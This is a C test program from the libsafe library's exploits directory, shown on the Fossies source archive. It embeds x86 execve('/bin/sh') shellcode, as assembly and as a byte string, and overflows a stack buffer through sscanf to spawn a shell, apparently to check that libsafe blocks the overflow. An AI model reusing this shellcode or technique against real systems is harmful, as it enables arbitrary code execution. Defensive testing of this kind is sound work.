"Fossies" - the Fresh Open Source Software Archive 
Member "libsafe-2.0-16/exploits/t6.c" (12 Jun 2002, 1445 Bytes) of package /linux/misc/old/libsafe-2.0-16.tgz:
As a special service "Fossies" has tried to format the requested source page into HTML format using (guessed) C and C++ source code syntax highlighting (style:
standard) with prefixed line numbers and
code folding option.
Alternatively you can here
view or
download the uninterpreted source code file.
1 /*
2 * $Name: release2_0-16 $
3 * $Id: t6.c,v 1.2 2002/06/12 20:30:37 ttsai Exp $
4 */
5
6
7 #include <stdio.h>
8 #include <string.h>
9
10 /*
11 jmp 1f
12 0:pop %esi
13 mov %esi,0x8(%esi)
14 xor %eax,%eax
15 mov %al,0x7(%esi)
16 mov %esi,%edi
17 add $4,%edi
18 mov %eax,0x8(%edi)
19 add $7,%eax
20 add $4,%eax
21 mov %esi,%ebx
22 lea 0x8(%esi),%ecx
23 lea 0x8(%edi),%edx
24 int $0x80
25 xor %ebx,%ebx
26 mov %ebx,%eax
27 inc %eax
28 int $0x80
29 1:call 0b");
30 */
31 char shellcode[] =
32 "\xeb\x28\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\xf7\x83\xc7\x04"
33 "\x89\x47\x08\x83\xc0\x07\x83\xc0\x04\x89\xf3\x8d\x4e\x08\x8d\x57"
34 "\x08\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd3\xff\xff\xff/bin/sh";
35
36 char large_string[128];
37
38 void foo()
39 {
40 char buffer[96];
41 int i;
42 long *long_ptr = (long *) large_string;
43
44
45 printf("This program tries to use scanf() to overflow the buffer.\n");
46 printf("If you get a /bin/sh prompt, then the exploit has worked.\n");
47 printf("Press any key to continue...");
48 getchar();
49
50 for (i = 0; i < 32; i++)
51 *(long_ptr + i) = (int) buffer;
52 for (i = 0; i < (int) strlen(shellcode); i++)
53 large_string[i] = shellcode[i];
54
55 sscanf(large_string, "%s", buffer);
56
57 return;
58 }
59
60 int main(int ac, char *av[])
61 {
62 foo();
63
64 printf("If you see this statement, it means that the buffer\n");
65 printf("overflow never occurred.\n");
66
67 return 0;
68 }